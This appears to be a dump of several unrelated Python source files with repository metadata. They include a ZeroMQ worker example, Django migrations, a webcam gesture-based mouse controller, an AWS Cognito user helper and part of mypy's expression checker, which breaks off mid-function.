elif item.startswith('#c'):
venue = item[2:].strip()
elif item.startswith('#index'):
idx = int(item[6:].strip())
elif item.startswith('#!'):
abstract = item[2:].strip()
elif item.startswith('#%'):
refs.append(int(item[2:].strip()))
if len(title + abstract) > 50:
papers.append({
"idx": idx,
"title": title,
"venue": venue,
"authors": authors,
"year": year,
"refs": refs,
"abstract": abstract
})
return papers
def load_experts(foldername, version="V1"):
print("Loading experts from '", foldername, "'")
list_of_files = {
"boosting": "Boosting.txt",
"data_mining": "Data-Mining.txt",
"information_extraction": "Information-Extraction.txt",
"intelligent_agents": "Intelligent-Agents.txt",
"machine_learning": "Machine-Learning.txt",
"natural_language_processing": "Natural-Language-Processing.txt",
"ontology_alignment": "Ontology-Alignment.txt",
"planning": "Planning.txt",
"semantic_web": "Semantic-Web.txt",
"support_vector_machine": "Support-Vector-Machine.txt",
"computer_vision": "Computer-Vision.txt",
"cryptography": "Cryptography.txt",
"neural_networks": "Neural-Networks.txt"
}
list_of_new_files = {
"information_extraction": "New-Information-Extraction.txt",
"intelligent_agents": "New-Intelligent-Agents.txt",
"machine_learning": "New-Machine-Learning.txt",
"natural_language_processing": "New-Natural-Language-Processing.txt",
"planning": "New-Planning.txt",
"semantic_web": "New-Semantic-Web.txt",
"support_vector_machine": "New-Support-Vector-Machine.txt",
}
authors = dict()
if version == "V2" or version == "V3":
for topic, filename in list_of_files.items():
authors[topic] = list()
file = pkg_resources.resource_filename("expert_finding", os.path.join(foldername, filename))
print("Reading file: ", filename)
with open(file, 'rb') as f:
for line in f:
try:
string = line.decode('utf-8').strip()
authors[topic].append(string)
except:
print("Can't decode:", line)
elif version == "V1":
for topic, filename in list_of_new_files.items():
authors[topic] = list()
file = pkg_resources.resource_filename("expert_finding", os.path.join(foldername, filename))
print("Reading file: ", filename)
with open(file, 'rb') as f:
for line in f:
try:
string = line.decode('utf-8').strip()
authors[topic].append(string)
except:
print("Can't decode:", line)
else:
print("Unknown version provided !")
return None
return authors
| [
"653574281@qq.com"
] | 653574281@qq.com |
51d9224e7d85e7e8c277046b5010c9ddf16e3dd0 | 57068b73b78602a4a8ea1c2c677b2c9867d7f208 | /examples-code/zmq/Request-Reply-Broker/rrworker.py | 0ef890c37bb4e131882a7fa89f9bf8c7118ec597 | [] | no_license | firewood1996/MELINDA | 2f158d1942224b1cb7ef72d46a5f510229f54e87 | a090cea086e6b2502ea4f910008f9daf50e464d6 | refs/heads/master | 2023-02-22T11:40:44.350351 | 2021-01-21T22:35:22 | 2021-01-21T22:35:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 964 | py | #
# Request-reply service in Python
# Connects REP socket to tcp://localhost:5560
#
import zmq
import threading
import time
import random
def worker_routine(url, id, context=None):
"""Worker routine"""
context = context or zmq.Context.instance()
# Socket to talk to dispatcher
socket = context.socket(zmq.REP)
socket.connect(url)
while True:
string = socket.recv()
print("Worker {}: Message request: {}".format(id, string))
# do some 'work'
work_time = random.randint(1, 100) * 0.01
time.sleep(work_time)
# send reply back to client
socket.send_string("Worker {} took {:.3f}s".format(id, work_time))
def main():
random.seed()
url_broker = "tcp://localhost:5560"
# Launch pool of worker threads
for i in range(5):
thread = threading.Thread(target=worker_routine, args=(url_broker, i,))
thread.start()
if __name__ == "__main__":
main()
| [
"aluiziorocha@gmail.com"
] | aluiziorocha@gmail.com |
865653721e38190f7bb6c4e6c6f1a383d99f2912 | af24f5e44068ddc91e05ecdbafac2d01755fd2e9 | /blog/migrations/0020_auto_20200628_1343.py | 2777a5cec6aa72149d91a967dc170165469e8635 | [] | no_license | IsraJC/my-first-blog | a34b666fe09ae091c54c00e6121a6bd528fd22e1 | 84bc92a6cde1aec527600040cd382cd1853c1574 | refs/heads/master | 2023-08-12T18:42:21.745988 | 2021-10-04T19:50:09 | 2021-10-04T19:50:09 | 269,368,823 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | # Generated by Django 2.2.13 on 2020-06-28 12:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0019_auto_20200628_1343'),
]
operations = [
migrations.AlterField(
model_name='cv',
name='number',
field=models.CharField(blank=True, default='', max_length=11),
),
]
| [
"israchanna@gmail.com"
] | israchanna@gmail.com |
2c1de13fdef7761a42417213fdc33376772cf25d | f06e3ade8249ccbee25ebad78dea2948c2286cdb | /marketplace/products/migrations/0002_auto_20190120_2126.py | 2cf39d0da9236d189f3da9d07b2e8cdda8523a9f | [] | no_license | billangli/shopify-backend-challenge-2019 | e5c22816f4c460ae13113fc1d0d4a8a50093c157 | e33a7c3870adee61edcf9880128a96d934529e7b | refs/heads/master | 2020-04-17T12:08:15.272777 | 2019-01-22T03:01:37 | 2019-01-22T03:01:37 | 166,569,083 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 681 | py | # Generated by Django 2.1.5 on 2019-01-20 21:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('products', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50)),
('price', models.FloatField()),
('inventory_count', models.IntegerField()),
],
),
migrations.DeleteModel(
name='Link',
),
]
| [
"bill.ang.li@hotmail.com"
] | bill.ang.li@hotmail.com |
e3d532d22641804ec9d82074ad11b3215ec161a3 | 4deaf8f4f1a91fc12c3a3d10bc8794fa62f54657 | /switch.py | f6bd0e72d22502c54be4568db69b160e68abb5b5 | [] | no_license | AdopaX/Manimouse | 03554d81ef5a1a8576ec7041d361541dff0c5096 | 3b02fca16b93be98af093274e6249465b9ee2295 | refs/heads/master | 2021-06-14T21:35:03.308346 | 2017-01-29T17:27:14 | 2017-01-29T17:27:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,308 | py | # All packages needed for the program are imported ahead
import cv2
import numpy as np
import pyautogui
import time
# Some global variables or others that need prior intialization are initalized here
# colour ranges for feeding to the inRange funtions
blue_range = np.array([[88,78,20],[128,255,255]])
yellow_range = np.array([[21,70,80],[61,255,255]])
red_range = np.array([[158,85,72],[180 ,255,255]])
# Prior initialization of all centers for safety
b_cen, y_pos, r_cen = [240,320],[240,320],[240,320]
cursor = [960,540]
# Area ranges for contours of different colours to be detected
r_area = [100,1700]
b_area = [100,1700]
y_area = [100,1700]
# Rectangular kernal for eroding and dilating the mask for primary noise removal
kernel = np.ones((7,7),np.uint8)
actionHistory = [' ' for i in range(7)]
# Status variables defined globally
perform = False
showCentroid = False
leftHand = False
# 'nothing' function is useful when creating trackbars
# It is passed as last arguement in the cv2.createTrackbar() function
def nothing(x):
pass
# To bring to the top the contours with largest area in the specified range
# Used in drawContour()
def swap( array, i, j):
temp = array[i]
array[i] = array[j]
array[j] = temp
# Distance between two centroids
def distance( c1, c2):
distance = pow( pow(c1[0]-c2[0],2) + pow(c1[1]-c2[1],2) , 0.5)
return distance
def makeActionHistory( preHistory, latestAction):
l = len(preHistory)
newHistory = [' ' for i in range(l)]
for i in range(l-2):
newHistory[i] = preHistory[i+1]
newHistory[l-1] = latestAction
return newHistory
def checkActionHistory( actionHistory, action):
for i in range(len(actionHistory)-1):
if actionHistory[i] == action:
return False
else:
return True
# To toggle status of control variables
def changeStatus(key):
global perform
global showCentroid
global leftHand
global yellow_range,red_range,blue_range
# toggle mouse simulation
if key == ord('p'):
perform = not perform
if perform:
print 'Mouse simulation ON...'
else:
print 'Mouse simulation OFF...'
# toggle display of centroids
elif key == ord('c'):
showCentroid = not showCentroid
if showCentroid:
print 'Showing Centroids...'
else:
print 'Not Showing Centroids...'
elif key == ord('r'):
print '**********************************************************************'
print ' You have entered recalibration mode.'
print ' Use the trackbars to calibrate and press SPACE when done.'
print ' Press D to use the default settings'
print '**********************************************************************'
yellow_range = calibrateColor('Yellow', yellow_range)
red_range = calibrateColor('Red', red_range)
blue_range = calibrateColor('Blue', blue_range)
elif key == ord('l'):
leftHand = not leftHand
if leftHand:
print 'Left-handed mode initiated...'
else:
print 'Right-handed mode initiated...'
else:
pass
# cv2.inRange function is used to filter out a particular color from the frame
# The result then undergoes morphosis i.e. erosion and dilation
# Resultant frame is returned as mask
def makeMask(hsv_frame, color_Range):
mask = cv2.inRange( hsv_frame, color_Range[0], color_Range[1])
# Morphosis next ...
eroded = cv2.erode( mask, kernel, iterations=1)
dilated = cv2.dilate( eroded, kernel, iterations=1)
return dilated
# Contours on the mask are detected.. Only those lying in the previously set area
# range are filtered out and the centroid of the largest of these is drawn and returned
def drawCentroid(vid, color_area, mask, showCentroid):
_, contour, _ = cv2.findContours( mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
l=len(contour)
area = np.zeros(l)
# filtering contours on the basis of area rane specified globally
for i in range(l):
if cv2.contourArea(contour[i])>color_area[0] and cv2.contourArea(contour[i])<color_area[1]:
area[i] = cv2.contourArea(contour[i])
else:
area[i] = 0
a = sorted( area, reverse=True)
# bringing contours with largest valid area to the top
for i in range(l):
for j in range(1):
if area[i] == a[j]:
swap( contour, i, j)
if l > 0 :
# finding centroid using method of 'moments'
M = cv2.moments(contour[0])
if M['m00'] != 0:
cx = int(M['m10']/M['m00'])
cy = int(M['m01']/M['m00'])
center = (cx,cy)
if showCentroid:
cv2.circle( vid, center, 5, (0,0,255), -1)
return center
else:
# return error handling values
return (-1,-1)
# This function helps in filtering the required colored objects from the background
def calibrateColor(color, def_range):
global kernel
name = 'Calibrate '+ color
cv2.namedWindow(name)
cv2.createTrackbar('Hue', name, def_range[0][0]+20, 180, nothing)
cv2.createTrackbar('Sat', name, def_range[0][1] , 255, nothing)
cv2.createTrackbar('Val', name, def_range[0][2] , 255, nothing)
while(1):
ret , frameinv = cap.read()
frame=cv2.flip(frameinv ,1)
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
hue = cv2.getTrackbarPos('Hue', name)
sat = cv2.getTrackbarPos('Sat', name)
val = cv2.getTrackbarPos('Val', name)
lower = np.array([hue-20,sat,val])
upper = np.array([hue+20,255,255])
mask = cv2.inRange(hsv, lower, upper)
eroded = cv2.erode( mask, kernel, iterations=1)
dilated = cv2.dilate( eroded, kernel, iterations=1)
cv2.imshow(name, dilated)
k = cv2.waitKey(5) & 0xFF
if k == ord(' '):
cv2.destroyWindow(name)
return np.array([[hue-20,sat,val],[hue+20,255,255]])
elif k == ord('d'):
cv2.destroyWindow(name)
return def_range
'''
This function takes as input the center of yellow region (yc) and
the previous cursor position (pyp). The new cursor position is calculated
in such a way that the mean deviation for desired steady state is reduced.
'''
def setCursorPos( yc, pyp):
yp = np.zeros(2)
if abs(yc[0]-pyp[0])<5 and abs(yc[1]-pyp[1])<5:
yp[0] = yc[0] + .7*(pyp[0]-yc[0])
yp[1] = yc[1] + .7*(pyp[1]-yc[1])
else:
yp[0] = yc[0] + .1*(pyp[0]-yc[0])
yp[1] = yc[1] + .1*(pyp[1]-yc[1])
return yp
# Depending upon the relative positions of the three centroids, this function chooses whether
# the user desires free movement of cursor, left click, right click or dragging
def chooseAction(yp, rc, bc, actionHistory):
out = np.array(['move', 'false'])
if rc[0]!=-1 and bc[0]!=-1:
if not leftHand and checkActionHistory( actionHistory, 'ONOFF'):
if bc[0]-yp[0]>130 and bc[1]-yp[1]>170 and bc[1]-rc[1]<40:
out[0] = 'ONOFF'
return out
elif leftHand and checkActionHistory( actionHistory, 'ONOFF'):
if yp[0]-bc[0]>130 and bc[1]-yp[1]>170 and bc[1]-rc[1]<40:
out[0] = 'ONOFF'
return out
if distance(yp,rc)<50 and distance(yp,bc)<50 and distance(rc,bc)<50 :
out[0] = 'drag'
out[1] = 'true'
return out
elif distance(rc,bc)<40:
out[0] = 'left'
return out
elif distance(yp,rc)<40 and checkActionHistory( actionHistory, 'right'):
out[0] = 'right'
return out
elif distance(yp,rc)>40 and rc[1]-bc[1]>120:
out[0] = 'down'
return out
elif bc[1]-rc[1]>110:
out[0] = 'up'
return out
else:
return out
else:
out[0] = -1
return out
# Movement of cursor on screen, left click, right click,scroll up, scroll down
# and dragging actions are performed here based on value stored in 'action'.
def performAction( yp, rc, bc, action, drag, perform):
if action == 'ONOFF':
perform = not perform
print perform
if perform:
print 'Mouse simulation ON...'
else:
print 'Mouse simulation OFF...'
if perform:
if not leftHand:
cursor[0] = 4*(yp[0]-110)
else:
cursor[0] = 4*(yp[0]-50)
cursor[1] = 4*(yp[1]-120)
if action == 'move':
if not leftHand:
if yp[0]>110 and yp[0]<590 and yp[1]>120 and yp[1]<390:
pyautogui.moveTo(cursor[0],cursor[1])
elif yp[0]<110 and yp[1]>120 and yp[1]<390:
pyautogui.moveTo( 8 , cursor[1])
elif yp[0]>590 and yp[1]>120 and yp[1]<390:
pyautogui.moveTo(1912, cursor[1])
elif yp[0]>110 and yp[0]<590 and yp[1]<120:
pyautogui.moveTo(cursor[0] , 8)
elif yp[0]>110 and yp[0]<590 and yp[1]>390:
pyautogui.moveTo(cursor[0] , 1072)
elif yp[0]<110 and yp[1]<120:
pyautogui.moveTo(8, 8)
elif yp[0]<110 and yp[1]>390:
pyautogui.moveTo(8, 1072)
elif yp[0]>590 and yp[1]>390:
pyautogui.moveTo(1912, 1072)
else:
pyautogui.moveTo(1912, 8)
else:
if yp[0]>50 and yp[0]<530 and yp[1]>120 and yp[1]<390:
pyautogui.moveTo(cursor[0],cursor[1])
elif yp[0]<50 and yp[1]>120 and yp[1]<390:
pyautogui.moveTo( 8 , cursor[1])
elif yp[0]>530 and yp[1]>120 and yp[1]<390:
pyautogui.moveTo(1912, cursor[1])
elif yp[0]>50 and yp[0]<530 and yp[1]<120:
pyautogui.moveTo(cursor[0] , 8)
elif yp[0]>50 and yp[0]<530 and yp[1]>390:
pyautogui.moveTo(cursor[0] , 1072)
elif yp[0]<50 and yp[1]<120:
pyautogui.moveTo(8, 8)
elif yp[0]<50 and yp[1]>390:
pyautogui.moveTo(8, 1072)
elif yp[0]>530 and yp[1]>390:
pyautogui.moveTo(1912, 1072)
else:
pyautogui.moveTo(1912, 8)
elif action == 'left':
pyautogui.click(button = 'left')
elif action == 'right':
pyautogui.click(button = 'right')
time.sleep(0.3)
elif action == 'up':
pyautogui.scroll(5)
# time.sleep(0.3)
elif action == 'down':
pyautogui.scroll(-5)
# time.sleep(0.3)
elif action == 'drag' and drag == 'true':
global y_pos
drag = 'false'
pyautogui.mouseDown()
while(1):
k = cv2.waitKey(10) & 0xFF
changeStatus(k)
_, frameinv = cap.read()
# flip horizontaly to get mirror image in camera
frame = cv2.flip( frameinv, 1)
hsv = cv2.cvtColor( frame, cv2.COLOR_BGR2HSV)
b_mask = makeMask( hsv, blue_range)
r_mask = makeMask( hsv, red_range)
y_mask = makeMask( hsv, yellow_range)
py_pos = y_pos
b_cen = drawCentroid( frame, b_area, b_mask, showCentroid)
r_cen = drawCentroid( frame, r_area, r_mask, showCentroid)
y_cen = drawCentroid( frame, y_area, y_mask, showCentroid)
if py_pos[0]!=-1 and y_cen[0]!=-1:
y_pos = setCursorPos(y_cen, py_pos)
performAction(y_pos, r_cen, b_cen, 'move', drag, perform)
cv2.imshow('Frame', frame)
if distance(y_pos,r_cen)>60 or distance(y_pos,b_cen)>60 or distance(r_cen,b_cen)>60:
break
pyautogui.mouseUp()
return perform
cap = cv2.VideoCapture(0)
print '**********************************************************************'
print ' You have entered calibration mode.'
print ' Use the trackbars to calibrate and press SPACE when done.'
print ' Press D to use the default settings.'
print '**********************************************************************'
yellow_range = calibrateColor('Yellow', yellow_range)
red_range = calibrateColor('Red', red_range)
blue_range = calibrateColor('Blue', blue_range)
print ' Calibration Successfull...'
cv2.namedWindow('Frame')
print '**********************************************************************'
print ' Press P to turn ON and OFF mouse simulation.'
print ' Press L to turn ON and OFF left-handed user mode.'
print ' Press C to display the centroid of various colours.'
print ' Press R to recalibrate color ranges.'
print ' Press ESC to exit.'
print '**********************************************************************'
while(1):
k = cv2.waitKey(10) & 0xFF
changeStatus(k)
_, frameinv = cap.read()
# flip horizontaly to get mirror image in camera
frame = cv2.flip( frameinv, 1)
hsv = cv2.cvtColor( frame, cv2.COLOR_BGR2HSV)
b_mask = makeMask( hsv, blue_range)
r_mask = makeMask( hsv, red_range)
y_mask = makeMask( hsv, yellow_range)
py_pos = y_pos
b_cen = drawCentroid( frame, b_area, b_mask, showCentroid)
r_cen = drawCentroid( frame, r_area, r_mask, showCentroid)
y_cen = drawCentroid( frame, y_area, y_mask, showCentroid)
if py_pos[0]!=-1 and y_cen[0]!=-1 and y_pos[0]!=-1:
y_pos = setCursorPos(y_cen, py_pos)
output = chooseAction(y_pos, r_cen, b_cen, actionHistory)
actionHistory = makeActionHistory( actionHistory, output[0])
print output[0]
if output[0]!=-1:
perform = performAction(y_pos, r_cen, b_cen, output[0], output[1], perform)
cv2.imshow('Frame', frame)
if k == 27:
break
cv2.destroyAllWindows()
| [
"noreply@github.com"
] | noreply@github.com |
3e74debc23e55b4b8d6a39cd6b30e66149ba4444 | 986ce59a572a9e3d9f606c4fcbec256776cce47a | /src/utils/cognitoUtils.py | dee82673ac05f95a362c2f596929cfee88be472d | [] | no_license | fbambusi/ido-measures-api | ce92f8f6e058e455a17d9cc55ac7f958440a2bdb | 73ba90a2800a7c086a694f170e24a35e4e41f938 | refs/heads/master | 2023-02-06T11:33:24.319122 | 2020-12-24T14:28:42 | 2020-12-24T14:28:42 | 324,167,416 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,034 | py | import os
import json
import boto3
from botocore.config import Config
def get_client():
my_config = Config(
region_name='eu-central-1',
)
uip = ("a/a/"+os.environ.get("COGNITO_POOL", 'eu-central-1_sPMQnKBGz')).split("/")[-1]
client = boto3.client('cognito-idp', config=my_config)
return client, uip
attribute_names_in_cognito_to_attribute_names_in_response = {
"custom:pots": {"rep_name": "pots", "default_value": "[]", "old_name": "pots"},
"custom:accepted_t_c": {"rep_name": "accepted_terms_and_conditions", "default_value": "REJECTED",
"old_name": "accepted_conditions"},
"custom:accepted_profilation": {"rep_name": "accepted_profilation", "default_value": "REJECTED",
"old_name": "accepted_profilation"},
"custom:accepted_marketing": {"rep_name": "accepted_marketing", "default_value": "REJECTED",
"old_name": "accepted_marketing"},
"custom:has_sensors": {"rep_name": "has_sensors", "default_value": "FALSE",
"old_name": "hasAssociatedPots"}
}
def get_current_conito_user(user_id):
client, pool_id = get_client()
response = client.admin_get_user(
UserPoolId=pool_id,
Username=user_id
)
return response,client
def get_user_rep(user_id):
response,client=get_current_conito_user(user_id)
rep = {"id": f"users/{user_id}"}
for att_name, features in attribute_names_in_cognito_to_attribute_names_in_response.items():
val = get_attribute_from_cognito_response(response, att_name, features["default_value"])
rep[features["rep_name"]] = val
rep["pots"] = json.loads(rep["pots"])
return rep
def get_attribute_from_cognito_response(cognito_response, attribute_name, default_value="REJECTED"):
atts = cognito_response["UserAttributes"]
elems = list(filter(lambda p: p["Name"] == attribute_name, atts))
if elems:
return elems[0]["Value"]
return default_value
| [
"fbambusi@github.com"
] | fbambusi@github.com |
175006eb5905eb05d3eff2e0c2859795a73c2c91 | 7e2d10ed5b62aa908f1facec1400c6b59314878e | /.venv/lib/python3.7/site-packages/mypy/checkexpr.py | 45e302f6595b20685e9aa4c77e360424d06d5cde | [] | no_license | iphysresearch/watchlist | dfe0370ae80d1ab0d4333af445bec9eb80a2ddde | 214a18d406e3b173cffa6eb2f5250d4553eda9f7 | refs/heads/master | 2020-04-11T20:19:16.424183 | 2019-01-14T17:36:09 | 2019-01-14T17:36:09 | 162,066,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175,805 | py | """Expression type checker. This file is conceptually part of TypeChecker."""
from collections import OrderedDict
from contextlib import contextmanager
from typing import (
cast, Dict, Set, List, Tuple, Callable, Union, Optional, Iterable,
Sequence, Iterator
)
MYPY = False
if MYPY:
from typing import ClassVar
from typing_extensions import Final
from mypy.errors import report_internal_error
from mypy.typeanal import (
has_any_from_unimported_type, check_for_explicit_any, set_any_tvars, expand_type_alias
)
from mypy.types import (
Type, AnyType, CallableType, Overloaded, NoneTyp, TypeVarDef,
TupleType, TypedDictType, Instance, TypeVarType, ErasedType, UnionType,
PartialType, DeletedType, UninhabitedType, TypeType, TypeOfAny,
true_only, false_only, is_named_instance, function_type, callable_type, FunctionLike,
StarType, is_optional, remove_optional, is_invariant_instance
)
from mypy.nodes import (
NameExpr, RefExpr, Var, FuncDef, OverloadedFuncDef, TypeInfo, CallExpr,
MemberExpr, IntExpr, StrExpr, BytesExpr, UnicodeExpr, FloatExpr,
OpExpr, UnaryExpr, IndexExpr, CastExpr, RevealExpr, TypeApplication, ListExpr,
TupleExpr, DictExpr, LambdaExpr, SuperExpr, SliceExpr, Context, Expression,
ListComprehension, GeneratorExpr, SetExpr, MypyFile, Decorator,
ConditionalExpr, ComparisonExpr, TempNode, SetComprehension,
DictionaryComprehension, ComplexExpr, EllipsisExpr, StarExpr, AwaitExpr, YieldExpr,
YieldFromExpr, TypedDictExpr, PromoteExpr, NewTypeExpr, NamedTupleExpr, TypeVarExpr,
TypeAliasExpr, BackquoteExpr, EnumCallExpr, TypeAlias, SymbolNode,
ARG_POS, ARG_OPT, ARG_NAMED, ARG_STAR, ARG_STAR2, MODULE_REF, LITERAL_TYPE, REVEAL_TYPE
)
from mypy.literals import literal
from mypy import nodes
import mypy.checker
from mypy import types
from mypy.sametypes import is_same_type
from mypy.erasetype import replace_meta_vars, erase_type
from mypy.messages import MessageBuilder
from mypy import messages
from mypy.infer import infer_type_arguments, infer_function_type_arguments
from mypy import join
from mypy.meet import narrow_declared_type
from mypy.subtypes import (
is_subtype, is_proper_subtype, is_equivalent, find_member, non_method_protocol_members,
)
from mypy import applytype
from mypy import erasetype
from mypy.checkmember import analyze_member_access, type_object_type
from mypy.argmap import ArgTypeExpander, map_actuals_to_formals, map_formals_to_actuals
from mypy.checkstrformat import StringFormatterChecker
from mypy.expandtype import expand_type, expand_type_by_instance, freshen_function_type_vars
from mypy.util import split_module_names
from mypy.typevars import fill_typevars
from mypy.visitor import ExpressionVisitor
from mypy.plugin import Plugin, MethodContext, MethodSigContext, FunctionContext
from mypy.typeanal import make_optional_type
# Type of callback user for checking individual function arguments. See
# check_args() below for details.
ArgChecker = Callable[[Type, Type, int, Type, int, int, CallableType, Context, MessageBuilder],
None]
# Maximum nesting level for math union in overloads, setting this to large values
# may cause performance issues. The reason is that although union math algorithm we use
# nicely captures most corner cases, its worst case complexity is exponential,
# see https://github.com/python/mypy/pull/5255#discussion_r196896335 for discussion.
MAX_UNIONS = 5 # type: Final
class TooManyUnions(Exception):
"""Indicates that we need to stop splitting unions in an attempt
to match an overload in order to save performance.
"""
def extract_refexpr_names(expr: RefExpr) -> Set[str]:
"""Recursively extracts all module references from a reference expression.
Note that currently, the only two subclasses of RefExpr are NameExpr and
MemberExpr."""
output = set() # type: Set[str]
while expr.kind == MODULE_REF or expr.fullname is not None:
if expr.kind == MODULE_REF and expr.fullname is not None:
# If it's None, something's wrong (perhaps due to an
# import cycle or a suppressed error). For now we just
# skip it.
output.add(expr.fullname)
if isinstance(expr, NameExpr):
is_suppressed_import = isinstance(expr.node, Var) and expr.node.is_suppressed_import
if isinstance(expr.node, TypeInfo):
# Reference to a class or a nested class
output.update(split_module_names(expr.node.module_name))
elif expr.fullname is not None and '.' in expr.fullname and not is_suppressed_import:
# Everything else (that is not a silenced import within a class)
output.add(expr.fullname.rsplit('.', 1)[0])
break
elif isinstance(expr, MemberExpr):
if isinstance(expr.expr, RefExpr):
expr = expr.expr
else:
break
else:
raise AssertionError("Unknown RefExpr subclass: {}".format(type(expr)))
return output
class Finished(Exception):
"""Raised if we can terminate overload argument check early (no match)."""
class ExpressionChecker(ExpressionVisitor[Type]):
"""Expression type checker.
This class works closely together with checker.TypeChecker.
"""
# Some services are provided by a TypeChecker instance.
chk = None # type: mypy.checker.TypeChecker
# This is shared with TypeChecker, but stored also here for convenience.
msg = None # type: MessageBuilder
# Type context for type inference
type_context = None # type: List[Optional[Type]]
strfrm_checker = None # type: StringFormatterChecker
plugin = None # type: Plugin
def __init__(self,
chk: 'mypy.checker.TypeChecker',
msg: MessageBuilder,
plugin: Plugin) -> None:
"""Construct an expression type checker."""
self.chk = chk
self.msg = msg
self.plugin = plugin
self.type_context = [None]
# Temporary overrides for expression types. This is currently
# used by the union math in overloads.
# TODO: refactor this to use a pattern similar to one in
# multiassign_from_union, or maybe even combine the two?
self.type_overrides = {} # type: Dict[Expression, Type]
self.strfrm_checker = StringFormatterChecker(self, self.chk, self.msg)
def visit_name_expr(self, e: NameExpr) -> Type:
"""Type check a name expression.
It can be of any kind: local, member or global.
"""
self.chk.module_refs.update(extract_refexpr_names(e))
result = self.analyze_ref_expr(e)
return self.narrow_type_from_binder(e, result)
def analyze_ref_expr(self, e: RefExpr, lvalue: bool = False) -> Type:
result = None # type: Optional[Type]
node = e.node
if isinstance(node, Var):
# Variable reference.
result = self.analyze_var_ref(node, e)
if isinstance(result, PartialType):
result = self.chk.handle_partial_var_type(result, lvalue, node, e)
elif isinstance(node, FuncDef):
# Reference to a global function.
result = function_type(node, self.named_type('builtins.function'))
elif isinstance(node, OverloadedFuncDef) and node.type is not None:
# node.type is None when there are multiple definitions of a function
# and it's decorated by something that is not typing.overload
result = node.type
elif isinstance(node, TypeInfo):
# Reference to a type object.
result = type_object_type(node, self.named_type)
if isinstance(result, CallableType) and isinstance(result.ret_type, Instance):
# We need to set correct line and column
# TODO: always do this in type_object_type by passing the original context
result.ret_type.line = e.line
result.ret_type.column = e.column
if isinstance(self.type_context[-1], TypeType):
# This is the type in a Type[] expression, so substitute type
# variables with Any.
result = erasetype.erase_typevars(result)
elif isinstance(node, MypyFile):
# Reference to a module object.
try:
result = self.named_type('types.ModuleType')
except KeyError:
# In test cases might 'types' may not be available.
# Fall back to a dummy 'object' type instead to
# avoid a crash.
result = self.named_type('builtins.object')
elif isinstance(node, Decorator):
result = self.analyze_var_ref(node.var, e)
elif isinstance(node, TypeAlias):
# Something that refers to a type alias appears in runtime context.
# Note that we suppress bogus errors for alias redefinitions,
# they are already reported in semanal.py.
result = self.alias_type_in_runtime_context(node.target, node.alias_tvars,
node.no_args, e,
alias_definition=e.is_alias_rvalue
or lvalue)
else:
# Unknown reference; use any type implicitly to avoid
# generating extra type errors.
result = AnyType(TypeOfAny.from_error)
assert result is not None
return result
def analyze_var_ref(self, var: Var, context: Context) -> Type:
if var.type:
return var.type
else:
if not var.is_ready and self.chk.in_checked_function():
self.chk.handle_cannot_determine_type(var.name(), context)
# Implicit 'Any' type.
return AnyType(TypeOfAny.special_form)
def visit_call_expr(self, e: CallExpr, allow_none_return: bool = False) -> Type:
"""Type check a call expression."""
if e.analyzed:
if isinstance(e.analyzed, NamedTupleExpr) and not e.analyzed.is_typed:
# Type check the arguments, but ignore the results. This relies
# on the typeshed stubs to type check the arguments.
self.visit_call_expr_inner(e)
# It's really a special form that only looks like a call.
return self.accept(e.analyzed, self.type_context[-1])
return self.visit_call_expr_inner(e, allow_none_return=allow_none_return)
def visit_call_expr_inner(self, e: CallExpr, allow_none_return: bool = False) -> Type:
if isinstance(e.callee, NameExpr) and isinstance(e.callee.node, TypeInfo) and \
e.callee.node.typeddict_type is not None:
# Use named fallback for better error messages.
typeddict_type = e.callee.node.typeddict_type.copy_modified(
fallback=Instance(e.callee.node, []))
return self.check_typeddict_call(typeddict_type, e.arg_kinds, e.arg_names, e.args, e)
if (isinstance(e.callee, NameExpr) and e.callee.name in ('isinstance', 'issubclass')
and len(e.args) == 2):
for typ in mypy.checker.flatten(e.args[1]):
if isinstance(typ, NameExpr):
node = None
try:
node = self.chk.lookup_qualified(typ.name)
except KeyError:
# Undefined names should already be reported in semantic analysis.
pass
if ((isinstance(typ, IndexExpr)
and isinstance(typ.analyzed, (TypeApplication, TypeAliasExpr)))
or (isinstance(typ, NameExpr) and node and
isinstance(node.node, TypeAlias) and not node.node.no_args)):
self.msg.type_arguments_not_allowed(e)
if isinstance(typ, RefExpr) and isinstance(typ.node, TypeInfo):
if typ.node.typeddict_type:
self.msg.fail(messages.CANNOT_ISINSTANCE_TYPEDDICT, e)
elif typ.node.is_newtype:
self.msg.fail(messages.CANNOT_ISINSTANCE_NEWTYPE, e)
self.try_infer_partial_type(e)
type_context = None
if isinstance(e.callee, LambdaExpr):
formal_to_actual = map_actuals_to_formals(
e.arg_kinds, e.arg_names,
e.callee.arg_kinds, e.callee.arg_names,
lambda i: self.accept(e.args[i]))
arg_types = [join.join_type_list([self.accept(e.args[j]) for j in formal_to_actual[i]])
for i in range(len(e.callee.arg_kinds))]
type_context = CallableType(arg_types, e.callee.arg_kinds, e.callee.arg_names,
ret_type=self.object_type(),
fallback=self.named_type('builtins.function'))
callee_type = self.accept(e.callee, type_context, always_allow_any=True)
if (self.chk.options.disallow_untyped_calls and
self.chk.in_checked_function() and
isinstance(callee_type, CallableType)
and callee_type.implicit):
return self.msg.untyped_function_call(callee_type, e)
# Figure out the full name of the callee for plugin lookup.
object_type = None
if not isinstance(e.callee, RefExpr):
fullname = None
else:
fullname = e.callee.fullname
if (isinstance(e.callee.node, TypeAlias) and
isinstance(e.callee.node.target, Instance)):
fullname = e.callee.node.target.type.fullname()
if (fullname is None
and isinstance(e.callee, MemberExpr)
and e.callee.expr in self.chk.type_map
and isinstance(callee_type, FunctionLike)):
# For method calls we include the defining class for the method
# in the full name (example: 'typing.Mapping.get').
callee_expr_type = self.chk.type_map[e.callee.expr]
fullname = self.method_fullname(callee_expr_type, e.callee.name)
if fullname is not None:
object_type = callee_expr_type
ret_type = self.check_call_expr_with_callee_type(callee_type, e, fullname, object_type)
if isinstance(e.callee, RefExpr) and len(e.args) == 2:
